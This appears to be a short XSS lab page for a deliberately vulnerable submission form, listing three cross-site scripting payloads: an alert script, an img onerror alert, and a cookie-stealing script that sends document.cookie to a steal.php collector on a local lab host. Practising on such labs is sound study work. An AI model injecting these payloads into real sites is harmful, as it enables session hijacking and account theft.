Application Submission Form (Vulnerable)
Basic XSS:
<script>alert('XSS')</script>
Cookie Stealing:
<script>document.location='http://localhost/xss-lab/steal.php?c='+document.cookie;</script>
Image XSS:
<img src=x onerror="alert('XSS')">